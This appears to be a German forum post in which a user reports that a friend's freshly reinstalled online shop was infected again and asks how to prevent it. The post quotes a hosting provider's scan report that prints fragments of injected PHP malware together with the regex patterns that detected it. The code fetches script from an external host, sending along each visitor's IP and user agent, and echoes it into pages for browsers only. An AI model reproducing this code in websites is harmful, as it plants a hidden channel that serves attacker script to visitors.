folgendes...der Shop (bzw. die Domain) eines Freundes war infiziert ....war ein alter ecb-shop drauf - also neuen shop gemacht (v2next) und diese woche von do auf fr nacht auf den server geladen.....alles war soweit ok bis jetzt...nun ist die seite nicht verfügbar und der provider hat eine infiziert.txt - Datei in den shop-Ordner gelegt wo jetzt zb. folgendes drin steht:
Changed -> 29.08.2014 00:25:46 +0200
Zeile -> SuchMuster -> FUND (Max. 300 Zeichen, gekuerzt, escaped..., angezeigt maximal: 20)
32 -> error_reporting(0); ini... -> error_reporting\(0\)\;ini_set\('display_errors',0\)\;\$wp_ob80=@\$_SERVER\['HTTP_USER_AGENT'\]\;
33 -> if (( preg_match ('/Gec... -> if\(\(preg_match\('/Gecko\|MSIE/i',\$wp_ob80\)\&\&!preg_match\('/bot/i',\$wp_ob80\)\)\)\{
33 -> if (( preg_match (./Gec... -> if\(\(preg_match\('/Gecko\|MSIE/i',\$wp_ob80\)\&\&!preg_match\('/bot/i',\$wp_ob80\)\)\)\{
33 -> if (( preg_match (./Gec... -> if\(\(preg_match\('/Gecko\|MSIE/i',\$wp_ob80\)\&\&!preg_match\('/bot/i',\$wp_ob80\)\)\)\{
34 -> "http://".".*".".*"."..... -> \$wp_ob0980="http://"."html"."string".".com/string"."/\?ip=".\$_SERVER\['REMOTE_ADDR'\]."\&referer=".urlencode\(\$_SERVER\['HTTP_HOST'\]\)."\&ua=".urlencode\(\$wp_ob80\)\;
34 -> $wp_.*="http://.*?ip=.*... -> \$wp_ob0980="http://"."html"."string".".com/string"."/\?ip=".\$_SERVER\['REMOTE_ADDR'\]."\&referer=".urlencode\(\$_SERVER\['HTTP_HOST'\]\)."\&ua=".urlencode\(\$wp_ob80\)\;
36 -> curl_setopt ($.*, CURLO... -> curl_setopt\(\$ch,CURLOPT_TIMEOUT,6\)\;curl_setopt\(\$ch,CURLOPT_RETURNTRANSFER,1\)\;\$wp_80ob=curl_exec\(\$ch\)\;curl_close\(\$ch\)\;\}
37 -> if ( substr(.*,.*,.*) =... -> if\(substr\(\$wp_80ob,1,3\)==='scr'\)\{echo\$wp_80ob\;\}
37 -> if ( substr($wp_.*,.*,.... -> if\(substr\(\$wp_80ob,1,3\)==='scr'\)\{echo\$wp_80ob\;\}
nun werde ich das alles löschen, also die texte aus den betroffenen dateien aber meine frage ist..
wie kann ich das in zukunft vermeiden?
der provider meinte nur soviel wie "das käme öfter vor bei seinen kunden, deshalb sollte man immer seine software auf dem neuesten stand halten usw. und wenn eine domain im visier sei, dann würden sie da halt auch immer eine lücke finden"...was soll ich denn mit der aussage anfangen?